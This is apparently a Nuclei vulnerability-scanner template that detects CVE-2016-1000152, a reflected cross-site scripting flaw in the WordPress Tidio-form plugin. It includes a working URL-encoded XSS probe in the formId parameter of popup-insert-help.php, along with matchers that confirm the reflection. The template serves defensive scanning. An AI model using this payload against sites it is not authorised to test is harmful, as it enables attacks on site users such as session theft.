nuclei-templates/http/cves/2016/CVE-2016-1000152.yaml

63 lines
2.3 KiB
YAML

id: CVE-2016-1000152
info:
name: WordPress Tidio-form <=1.0 - Cross-Site Scripting
author: daffainfo
severity: medium
description: WordPress tidio-form1.0 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement.
remediation: |
Update to the latest version of the Tidio-form plugin (version >1.0) to mitigate the XSS vulnerability.
reference:
- http://www.vapidlabs.com/wp/wp_advisory.php?v=799
- https://wordpress.org/plugins/tidio-form
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000152
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000152
cwe-id: CWE-79
epss-score: 0.00251
epss-percentile: 0.63018
cpe: cpe:2.3:a:tidio-form_project:tidio-form:1.0:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
vendor: "tidio-form_project"
product: "tidio-form"
framework: wordpress
tags: cve2016,cve,wordpress,xss,wp-plugin,tidio-form_project
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/tidio-form/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Easy Contact Form Builder ='
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a0047304502206c6c1027b1df7e5b08532b589beafb8f1513c1bcc70e929fdd0826af5e95664c022100e634e9f3a690e8629bb5fd2f2c18eb1124c26d621c3cf50889eab7ac69a2286a:922c64590222798bb761d5b6d8e72950